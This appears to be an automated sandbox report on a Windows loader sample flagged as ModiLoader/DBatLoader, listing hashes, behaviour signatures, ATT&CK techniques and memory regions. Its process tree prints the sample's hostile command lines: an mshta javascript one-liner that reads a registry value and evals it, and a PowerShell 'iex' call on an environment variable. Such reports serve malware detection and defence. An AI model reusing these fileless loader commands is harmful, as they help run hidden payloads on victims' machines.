Analysis

  • max time kernel
    141s
  • max time network
    94s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-06-2024 01:53

General

  • Target

    e93ea2c9e689a35ef77e597a4cf34409f9c02dd74790716eae060304995d6289.exe

  • Size

    386KB

  • MD5

    b44a8dbe40cf3d75a23d5b991246249b

  • SHA1

    78f70912abd3599935dd15d12428b41bee81e452

  • SHA256

    e93ea2c9e689a35ef77e597a4cf34409f9c02dd74790716eae060304995d6289

  • SHA512

    9dbdd06ba87fb1478c07bf97facf69e079553393c3905afc960ea1bb5727aa59b260bd77652b3c877de518234875f6a8fb7fd82096c9049578ae143d47609251

  • SSDEEP

    6144:JzYyFEqhqQK0TNhueSIfpzDx0J6Mml61EqIMiFNEnpIxI62:T1oQ1TbnRHclBIMiQpU2

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • ModiLoader Second Stage 9 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e93ea2c9e689a35ef77e597a4cf34409f9c02dd74790716eae060304995d6289.exe
    "C:\Users\Admin\AppData\Local\Temp\e93ea2c9e689a35ef77e597a4cf34409f9c02dd74790716eae060304995d6289.exe"
    1⤵
      PID:4884
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:L4XAIKfw="nShdLyL";zv2=new%20ActiveXObject("WScript.Shell");Gy2kl="SYb1iP";YB9zx8=zv2.RegRead("HKCU\\software\\Xkhm3Cf\\yhByHM");SVam7s="At0Ga4";eval(YB9zx8);vlOXZi4Q="ONUgR";
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1620
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:tmxrxs
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2664

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wok1hyec.bte.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/2664-25-0x00000000058C0000-0x0000000005C14000-memory.dmp
      Filesize

      3.3MB

    • memory/2664-13-0x0000000004FE0000-0x0000000005002000-memory.dmp
      Filesize

      136KB

    • memory/2664-12-0x0000000005140000-0x0000000005768000-memory.dmp
      Filesize

      6.2MB

    • memory/2664-15-0x0000000005850000-0x00000000058B6000-memory.dmp
      Filesize

      408KB

    • memory/2664-14-0x00000000057E0000-0x0000000005846000-memory.dmp
      Filesize

      408KB

    • memory/2664-28-0x00000000075F0000-0x0000000007C6A000-memory.dmp
      Filesize

      6.5MB

    • memory/2664-29-0x00000000062A0000-0x00000000062BA000-memory.dmp
      Filesize

      104KB

    • memory/2664-27-0x0000000005DB0000-0x0000000005DFC000-memory.dmp
      Filesize

      304KB

    • memory/2664-26-0x0000000005D90000-0x0000000005DAE000-memory.dmp
      Filesize

      120KB

    • memory/2664-11-0x00000000049B0000-0x00000000049E6000-memory.dmp
      Filesize

      216KB

    • memory/4884-4-0x0000000002300000-0x00000000023DC000-memory.dmp
      Filesize

      880KB

    • memory/4884-5-0x0000000002300000-0x00000000023DC000-memory.dmp
      Filesize

      880KB

    • memory/4884-9-0x0000000002300000-0x00000000023DC000-memory.dmp
      Filesize

      880KB

    • memory/4884-7-0x0000000000400000-0x0000000000467638-memory.dmp
      Filesize

      413KB

    • memory/4884-1-0x0000000000400000-0x0000000000467638-memory.dmp
      Filesize

      413KB

    • memory/4884-8-0x0000000002300000-0x00000000023DC000-memory.dmp
      Filesize

      880KB

    • memory/4884-0-0x0000000000455000-0x0000000000457000-memory.dmp
      Filesize

      8KB

    • memory/4884-2-0x0000000002300000-0x00000000023DC000-memory.dmp
      Filesize

      880KB

    • memory/4884-6-0x0000000002300000-0x00000000023DC000-memory.dmp
      Filesize

      880KB

    • memory/4884-3-0x0000000002300000-0x00000000023DC000-memory.dmp
      Filesize

      880KB

    • memory/4884-34-0x0000000000455000-0x0000000000457000-memory.dmp
      Filesize

      8KB